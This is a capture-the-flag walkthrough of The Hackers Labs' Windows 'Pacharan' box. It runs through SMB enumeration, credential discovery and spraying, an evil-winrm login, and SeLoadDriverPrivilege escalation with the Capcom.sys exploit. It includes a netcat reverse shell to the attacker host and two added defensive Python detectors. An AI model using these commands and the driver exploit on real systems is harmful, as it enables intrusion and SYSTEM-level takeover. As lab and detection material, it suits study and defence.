Lab: The Hackers Labs
URL: https://thehackerslabs.com/pacharan/
System: Windows
Topics: SMB information gathering, rpcclient usage, SeLoadDriverPrivilege privilege escalation
This box uses the fixed IP 192.168.69.69, so the network adapter has to be configured first.
Scan the ports.
└─$ nmap -sV -sC -Pn -p- -oN port.log $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 11:54 CST
Nmap scan report for 192.168.69.69
Host is up (0.00040s latency).
Not shown: 65511 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-09 10:54:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:85:92:9F (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:85:92:9f (Oracle VirtualBox virtual NIC)
|_clock-skew: 6h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-11-09T10:55:29
|_ start_date: 2024-11-09T10:52:07
Out of habit, I start by enumerating the SMB shares.
└─$ crackmapexec smb $IP -u 'null' -p '' --shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\null:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON2 READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PDF Pro Virtual Printer Soy Hacker y arreglo impresoras
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ print$ Controladores de impresora
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Users
Look at the user names.
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\anonymous: (Guest)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 498: PACHARAN\Enterprise Domain Controllers de sólo lectura (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 500: PACHARAN\Administrador (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 501: PACHARAN\Invitado (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 502: PACHARAN\krbtgt (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 503: PACHARAN\DefaultAccount (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 512: PACHARAN\Admins. del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 513: PACHARAN\Usuarios del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 514: PACHARAN\Invitados del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 515: PACHARAN\Equipos del dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 516: PACHARAN\Controladores de dominio (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 517: PACHARAN\Publicadores de certificados (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 518: PACHARAN\Administradores de esquema (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 519: PACHARAN\Administradores de empresas (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 520: PACHARAN\Propietarios del creador de directivas de grupo (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 521: PACHARAN\Controladores de dominio de sólo lectura (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 522: PACHARAN\Controladores de dominio clonables (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 525: PACHARAN\Protected Users (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 526: PACHARAN\Administradores clave (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 527: PACHARAN\Administradores clave de la organización (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 553: PACHARAN\Servidores RAS e IAS (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 571: PACHARAN\Grupo de replicación de contraseña RODC permitida (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 572: PACHARAN\Grupo de replicación de contraseña RODC denegada (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1000: PACHARAN\WIN-VRU3GG3DPLJ$ (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1101: PACHARAN\DnsAdmins (SidTypeAlias)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1102: PACHARAN\DnsUpdateProxy (SidTypeGroup)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1103: PACHARAN\Orujo (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1104: PACHARAN\Ginebra (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1106: PACHARAN\Whisky (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1107: PACHARAN\Hendrick (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1108: PACHARAN\Chivas Regal (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1111: PACHARAN\Whisky2 (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1112: PACHARAN\JB (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1113: PACHARAN\Chivas (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1114: PACHARAN\beefeater (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1115: PACHARAN\CarlosV (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1116: PACHARAN\RedLabel (SidTypeUser)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ 1117: PACHARAN\Gordons (SidTypeUser)
Use a regex to extract the user names and save them to names.txt.
└─$ netexec smb $IP -u 'anonymous' -p '' --rid-brute |grep -oP '(?<=PACHARAN\\)[^ ]+(?: [^ ]+)*(?= \(SidTypeUser\))'
Administrador
Invitado
krbtgt
DefaultAccount
WIN-VRU3GG3DPLJ$
Orujo
Ginebra
Whisky
Hendrick
Chivas Regal
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons
Among the SMB shares, NETLOGON2 is an unusual one and it is readable; connect to it and download the single file it holds.
└─$ smbclient //$IP/NETLOGON2 -U 'null'
Password for [WORKGROUP\null]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Aug 1 01:25:34 2024
.. D 0 Thu Aug 1 01:25:34 2024
Orujo.txt A 22 Thu Aug 1 01:25:55 2024
7735807 blocks of size 4096. 4578355 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (10.7 KiloBytes/sec) (average 10.7 KiloBytes/sec)
Looking at the file content, it may be the Orujo user's password. Testing it confirms the credential, and the PACHARAN share becomes readable.
└─$ crackmapexec smb $IP -u Orujo -p $(cat Orujo.txt) --shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Orujo:Pericodelospalotes6969
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON READ Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON2
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PDF Pro Virtual Printer Soy Hacker y arreglo impresoras
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ print$ Controladores de impresora
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Users
Connect to the PACHARAN share as Orujo and download another file.
└─$ smbclient //$IP/PACHARAN -U Orujo%$(cat Orujo.txt)
Try "help" to get a list of possible commands.
smb: \> ls -la
NT_STATUS_NO_SUCH_FILE listing \-la
smb: \> dir
. D 0 Thu Aug 1 01:21:13 2024
.. D 0 Thu Aug 1 01:21:13 2024
ah.txt A 921 Thu Aug 1 01:20:16 2024
7735807 blocks of size 4096. 4578355 blocks available
smb: \> get ah.txt
getting file \ah.txt of size 921 as ah.txt (89.9 KiloBytes/sec) (average 89.9 KiloBytes/sec)
ah.txt holds many password-like strings; brute-forcing them against the user list shows one of them is Whisky's password.
└─$ netexec smb $IP -u names.txt -p ah.txt
...
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Orujo:MamasoyStream2er@ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [-] PACHARAN.THL\Ginebra:MamasoyStream2er@ STATUS_LOGON_FAILURE
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
With the Whisky user, query the virtual printer information (the SMB listing earlier showed a PDF printer) and another string that looks like a password turns up.
└─$ rpcclient -U "Whisky%MamasoyStream2er@" $IP -c 'enumprinters'
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
In the same way, find out which user this password belongs to.
└─$ netexec winrm $IP -u names.txt -p TurkisArrusPuchuchuSiu1
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
...
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)
After logging in to the shell, check the privileges.
└─$ evil-winrm -i $IP -u 'Chivas Regal' -p TurkisArrusPuchuchuSiu1
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
SeLoadDriverPrivilege can be used for privilege escalation. Searching GitHub for related code, I used https://github.com/k4sth4/SeLoadDriverPrivilege here.
Upload the relevant files to the target and start the escalation; note that the driver must be given as an absolute path.
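A defender-side check, added here and not part of the write-up: a small parser for the `whoami /priv` listing above that flags privileges a standard user account should not hold. The SAMPLE text reproduces the Spanish-locale output shown above; the HIGH_RISK table and the risk notes are my own and not from the page or any tool.

```python
"""Audit a `whoami /priv` listing for privileges that let a standard user escalate.
Parsing is locale-independent: the first column is always the Se*Privilege name and
the last column the state (Enabled/Disabled, or Habilitada/Deshabilitada in Spanish)."""
import re

# Privileges that, held by a non-admin, are sufficient to reach SYSTEM or read
# protected data. Any of these on a regular user account is a finding.
HIGH_RISK = {
    "SeLoadDriverPrivilege": "can load a kernel driver, including a signed but vulnerable one",
    "SeDebugPrivilege": "can open and tamper with SYSTEM processes",
    "SeImpersonatePrivilege": "can impersonate other accounts' tokens",
    "SeAssignPrimaryTokenPrivilege": "can start processes under another account's token",
    "SeBackupPrivilege": "can read any file, including SAM and NTDS.dit",
    "SeRestorePrivilege": "can write any file or registry key",
    "SeTakeOwnershipPrivilege": "can take ownership of any securable object",
}
ENABLED_WORDS = {"enabled", "habilitada", "habilitado"}  # English and Spanish whoami output

# privilege name, free-text description, single-word state at end of line
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(\S+)\s*$")

def parse_privileges(text):
    """Return {privilege_name: enabled_bool} from raw `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3).lower() in ENABLED_WORDS
    return privs

def audit(text):
    """Return (privilege, enabled, risk_note) for every high-risk privilege in the listing."""
    return [(name, on, HIGH_RISK[name]) for name, on in parse_privileges(text).items()
            if name in HIGH_RISK]

# Constructed sample: the Spanish-locale listing shown above for the Chivas Regal account.
SAMPLE = """INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio          Descripción                                     Estado
============================= =============================================== ==========
SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio        Habilitada
SeLoadDriverPrivilege         Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege       Omitir comprobación de recorrido                Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso    Habilitada
"""

if __name__ == "__main__":
    for name, on, note in audit(SAMPLE):
        print(f"[!] {name} ({'enabled' if on else 'disabled'}): {note}")
```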
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe LOAD 'C:\Users\Chivas Regal\Desktop\Capcom.sys'
[*] Service Name: koffbviz
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001B08BE20008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
Upload nc64.exe to the target, start a listener on the attacking machine, and get a shell back.
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> cp \\192.168.69.3\kali\nc64.exe .\
*Evil-WinRM* PS C:\Users\Chivas Regal\Desktop> .\ExploitCapcom.exe EXPLOIT '.\nc64.exe 192.168.69.3 1234 -e cmd'
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.69.3] from (UNKNOWN) [192.168.69.69] 62803
Microsoft Windows [Versión 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Users\Chivas Regal\Desktop>whoami
whoami
nt authority\system
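Detection logic for the technique demonstrated above, as an added example that is not from the write-up or the k4sth4 repository: constructed Sysmon-style events (field names assumed to follow Sysmon's Event ID 13 registry-value-set and Event ID 6 driver-loaded schemas) are checked for a driver ImagePath written under a user SID's hive and for a kernel driver loaded from outside System32\drivers. The SID and paths in the sample are the ones visible in the session above.

```python
"""Detect the HKCU driver-service trick shown above: a CurrentControlSet service entry
written into a user hive (HKU, not HKLM), then a kernel driver loaded from a user path.
Events are constructed Sysmon-style records, not real telemetry from the box."""
import re

# Driver services legitimately live under HKLM\System\CurrentControlSet\Services. An
# ImagePath under a user SID's CurrentControlSet is the hallmark of the technique above.
USER_HIVE_IMAGEPATH = re.compile(
    r"^HKU\\S-1-5-21-[\d-]+\\System\\CurrentControlSet\\.*\\ImagePath$", re.IGNORECASE)
TRUSTED_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
# Only the driver named on the page; a real deployment would load Microsoft's full blocklist.
KNOWN_VULNERABLE = {"capcom.sys"}

def check_registry_event(ev):
    """Alert for a Sysmon EventID 13 record whose target is a driver ImagePath in HKU."""
    if ev.get("EventID") != 13 or not USER_HIVE_IMAGEPATH.match(ev.get("TargetObject", "")):
        return None
    return f"driver ImagePath written to user hive by {ev['Image']}: {ev['Details']}"

def check_driver_load(ev):
    """Alert for a Sysmon EventID 6 record naming a vulnerable or oddly located driver."""
    if ev.get("EventID") != 6:
        return None
    path = ev.get("ImageLoaded", "").lower()
    reasons = []
    if path.rsplit("\\", 1)[-1] in KNOWN_VULNERABLE:
        reasons.append("known vulnerable driver")
    if not path.startswith(TRUSTED_DRIVER_DIR):
        reasons.append("loaded from outside System32\\drivers")
    return f"suspicious driver load {path}: {', '.join(reasons)}" if reasons else None

def scan(events):
    """Run both checks over a list of event dicts and return the alerts in order."""
    alerts = []
    for ev in events:
        for check in (check_registry_event, check_driver_load):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts

# Constructed sample telemetry modelled on the session above; the last two are benign.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\Chivas Regal\Desktop\eoploaddriver_x64.exe",
     "TargetObject": r"HKU\S-1-5-21-3046175042-3013395696-775018414-1108\System\CurrentControlSet\dfserv\ImagePath",
     "Details": r"\??\C:\Users\Chivas Regal\Desktop\Capcom.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\Chivas Regal\Desktop\Capcom.sys"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\ImagePath",
     "Details": r"System32\drivers\tcpip.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
]
```

Running `scan(SAMPLE_EVENTS)` yields two alerts, one per malicious event, and none for the benign Tcpip entries.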